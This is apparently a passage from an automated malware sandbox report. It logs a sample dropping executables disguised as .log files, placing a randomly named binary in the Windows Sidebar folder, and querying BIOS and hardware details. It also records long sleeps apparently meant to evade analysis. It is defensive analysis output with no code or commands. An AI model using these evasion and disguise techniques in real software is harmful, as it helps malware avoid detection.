                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598282Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 3600000Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598157Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598047Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597938Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597828Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597719Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597609Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597500Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597391Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597281Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597172Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597062Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596953Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596844Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596734Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596625Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596516Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596391Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596266Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596156Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596047Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595922Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595813Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595688Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595578Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595469Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595344Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595110Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594729Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594547Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594434Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594325Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594219Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWindow / User API: threadDelayed 2487Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWindow / User API: threadDelayed 7295Jump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\JiQSSPWn.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\HSyuVsJS.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\MYHJZLWg.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\rkXniOKV.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\rAZFtXSs.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\tgLOyLgZ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\RunsezZZ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\UswiSVHk.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\SRkiCrbU.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\JMBKMsmH.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\xsCeWCWh.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\pxmXXnNx.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\PjdKZeCh.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\olJxrfqf.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\SHQSLHwr.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\EZjMkwXT.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\zuoNrmbc.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\gzRpdDAs.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\XMlAJXRO.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\lPgyvanJ.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\PWlCEuly.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZPYieGWJ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\jxryOjbr.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\vRqeFZrR.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\OsAKJQVe.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZeaApOeg.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\nxFpFSuh.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\ejzRghnX.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\DyXMTSsE.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\mEXomrcz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\gdBhXhQN.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\lyZggEuH.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\noipVfbk.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\asIaZkme.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\WgArDiDi.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\HbVuFfcO.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\PvGkFmYz.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\uHWOOpMo.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\ougxbSJc.logJump to dropped file
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeDropped PE file which has not been started: C:\Users\user\Desktop\AlRNHzIf.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\HLTcvXUr.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\cJayVGAz.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\CYBeSaFD.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeDropped PE file which has not been started: C:\Users\user\Desktop\wYpmLLZJ.logJump to dropped file
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exe TID: 1720Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7532Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -600000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -599875s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -599766s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -599641s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -599531s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -599422s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -599313s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -599188s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -599063s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -598907s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -598782s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -598657s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -598532s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -598407s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -598282s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7868Thread sleep time: -7200000s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -598157s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -598047s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -597938s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -597828s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -597719s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -597609s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -597500s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -597391s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -597281s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -597172s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -597062s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596953s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596844s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596734s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596625s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596516s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596391s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596266s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596156s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -596047s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595922s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595813s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595688s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595578s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595469s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595344s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595235s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -595110s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594985s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594729s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594547s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594434s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594325s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe TID: 7884Thread sleep time: -594219s >= -30000sJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC51D59A GetSystemInfo,0_2_00007FFAAC51D59A
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 30000Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 600000Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599875Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599766Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599641Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599531Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599422Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599313Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599188Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 599063Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598907Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598782Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598657Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598532Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598407Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598282Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 3600000Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598157Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 598047Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597938Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597828Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597719Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597609Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597500Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597391Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597281Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597172Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 597062Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596953Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596844Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596734Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596625Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596516Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596391Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596266Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596156Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 596047Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595922Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595813Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595688Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595578Jump to behavior
